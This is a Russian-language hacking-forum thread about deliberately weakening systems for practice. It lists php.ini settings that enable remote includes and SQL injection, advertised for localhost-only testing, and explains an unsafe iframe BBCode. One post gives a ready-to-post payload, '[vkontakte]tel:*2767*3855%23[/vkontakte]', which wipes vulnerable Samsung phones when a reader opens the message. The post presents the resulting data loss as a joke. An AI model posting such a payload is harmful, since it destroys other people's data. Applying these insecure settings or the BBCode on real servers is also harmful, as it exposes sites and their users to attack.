• Привет !

    На форуме есть зеркало в ТОРе:rusfwz3cukdej7do.onion

    Обратная связь:info@ru-sfera.org

    Всего доброго !

Вредные советы или полигон для хакеров (1 Viewer)

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 382
Репутация
7 876
Telegram
В этой теме выкладываем советы, как сделать систему уязвимой к хакерским атакам, да-да это не опечатка, для чего это нужно:

1)Для атак (Dmeh-Smeh-Smeh!!! ), на самом деле очень полезно как для безопасника, т.к. позволит определить например, как будет вести себя система в случае успешно атаки...

Хакеру-же отличный полигон для тренировок !

Это полезно также новичкам, которые настраивают свои сервера, а вдруг у вас так и настроено всё...Отдыхай!!!

Тренироваться лучше на локалхосте, например Денвер (http://ru-sfera.org/threads/Устанав...-сервер-на-свой-компьютер-аля-virtualbox.557/), можно на других...

Итак начну:

Что-бы было камельфо, нужно внести некоторые изменения в конфигурацию нашего сервера, а именно интерпретатора php !big010101

Откройте конфигурационный файл php.ini, найдите и отредактируйте указанные ниже директивы:

Выкладываю с комментариями:

Код:
register_globals=ON ; глобализация переменных - потенциальная брешь в безопасности
magic_quotes=OFF ; отключаем магические кавычки для GET/POST/COOKIE - благоприятствует SQL-injection и позволяет использовать нуль-байт в инклудах
magic_quotes_runtime=OFF ; благоприятствует SQL-injection
magic_quotes_sybase=OFF ; благоприятствует SQL-injection
mysql.trace_mode=ON ; включает показ ошибок Mysql
allow_url_fopen=ON ; разрешает удаленное открытие файлов файловыми функциями
allow_url_include=ON ; разрешает удаленно инклудить файлы
error_reporting=E_ALL ; показ всех ошибок
disable_functions= ; никаких ограничений
safe_mode=OFF ; никаких ограничений
open_basedir= ; никаких ограничений
sql.safe_mode=OFF ;
Далее перезагружаем сервак, а что-бы было вообще круто, ищем какой-нибудь скриптик по старей, желательно форум или CSM, далее выкладываем своё творение на хакзону, или античат, с нехорошими комментариями и ждём, будет круто...so happy

Это была шутка, ну а если серьёзно:

Внимание! Данная конфигурация сервера способствует проявлению множества критических уязвимостей веб-приложений и снижает его защищённость. Используйте данную конфигурацию только для тестирования уязвимостей веб приложений и только на localhost-сервере.

В общем понятно в этой теме делимся ещё "Советами", пытаемся взломать такую систему и делимся результатами своей работы, хи-хи ! Отдыхай!!!
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 382
Репутация
7 876
Telegram
Есть ещё один вредный совет для форумов, таких популярных движков как phpbb3, XenForo, Vbulletin и т.д.:

Многие "Эксперты" дают рекомендации вставлять например видео с ВКонтакте при помощи BBCode:
Код:
[vkontakte]{TEXT}[/vkontakte]
с заменой HTML, с использованием скрытого фрейма т.е. примерно такой код:
Код:
<iframe src="{TEXT}" width="607" height="360" frameborder="0"></iframe>
Данный код отлично выполняет свою задачу, но человек даже с небольшим опытом в HTML должен сразу заметить, что этот код опасен и уязвим. По сути он позволяет встроить в сообщение фрейм с абсолютно любой ссылкой. Многим злоумышленникам только это и нужно. Обычно после взлома сайта первым делом они встраивают скрытые фреймы, в которые загружается код, пытающийся заразить машины всех ваших пользователей через известные уязвимости. То есть установив такой BBCode вы избавите хакеров от необходимости взламывать ваш сайт — всё и так уже готово.

Можно делать с таким форумом, что захотите, использовать различные уязвимости, вот например из весёлых:

Уязвимость в Андройде старая правда, но прикольная одна строка HTML кода может удалить данные или перезагрузить телефоны Samsung:http://habrahabr.ru/post/152209/

Достаточно запостить такой код:
Код:
[vkontakte]tel:*2767*3855%23[/vkontakte]
Стоит только попытаться прочесть это сообщение с уязвимого устройства — и все ваши данные будут уничтожены !!!wacko88 ohmy88 wink1
 

Rustam

Министерство любви.
Форумчанин
Регистрация
31.08.2016
Сообщения
71
Репутация
11
В этих ваших интернетах поговаривают, что есть очень хороший полигон для тренировок - metasploitable 2, но все никак руки не дойдут до него.